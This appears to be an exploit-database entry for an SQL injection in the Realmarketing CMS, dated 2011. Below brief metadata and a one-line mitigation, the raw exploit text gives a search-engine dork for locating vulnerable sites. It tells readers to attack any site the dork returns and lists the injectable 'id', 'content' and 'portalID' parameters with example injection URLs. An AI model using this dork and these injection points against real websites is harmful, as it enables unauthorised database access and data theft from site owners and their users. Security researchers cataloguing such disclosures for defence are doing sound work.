header-logo
Suggest Exploit
vendor:
CMS System
by:
^Xecuti0n3r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Realmarketing CMS System Sensitive Database Disclosure Vulnerability

The vulnerability exists in Realmarketing CMS System, which allows an attacker to inject malicious SQL queries via the vulnerable parameters such as 'id', 'content' and 'portalID'. An attacker can exploit this vulnerability to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 22.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:realweb.de inurl:default.php
#(+) Category  : Web Apps [SQli]
 
____________________________________________________________________
____________________________________________________________________
 
Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine
 
 
    *SQL injection Vulnerability*

#      [+]http://site.com/default.php?id='125
#      [+]http://site.com/default.php?id=[SQLI]
#      [+]http://site.com/default.php?content='2485
#      [+]http://site.com/default.php?content=[SQLI]
#      [+]http://site.com/default.php?portalID='68
#      [+]http://site.com/default.php?portalID=[SQLI]
#      [+]http://site.com/default.php?&id='121
#      [+]http://site.com/default.php?&id=[SQLI] 
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################